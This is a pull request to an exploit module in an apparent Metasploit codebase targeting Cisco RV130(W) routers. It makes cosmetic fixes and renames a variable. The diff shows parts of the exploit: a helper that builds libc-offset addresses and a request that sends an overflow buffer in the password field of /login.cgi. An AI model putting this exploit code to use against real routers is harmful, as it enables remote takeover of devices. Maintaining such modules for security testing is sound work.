### PR TITLE
Address minor issues in Cisco RV130(W) exploit

### DIFF
--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
   end
 
-  def p (offset)
+  def p(offset)
     [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
   end
 
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode
   end
 
-  def send_request (payload)
+  def send_request(buffer)
     begin
       send_request_cgi({
         'uri'     => '/login.cgi',
@@ -111,8 +111,8 @@ class MetasploitModule < Msf::Exploit::Remote
               "wait_time": 0,
               "change_action": "",
               "enc": 1,
-              "user": "cisco",
-              "pwd": payload,
+              "user": rand_text_alpha_lower(5),
+              "pwd": buffer,
               "sel_lang": "EN"
           }
       })


### PR DESCRIPTION
These changes don't affect the outcome of the module.

1. Method definitions should look consistent
2. `payload` has special meaning, so let's pick a different variable name
3. The username can be randomized (length and case preserved just in case)

Fixes #11613.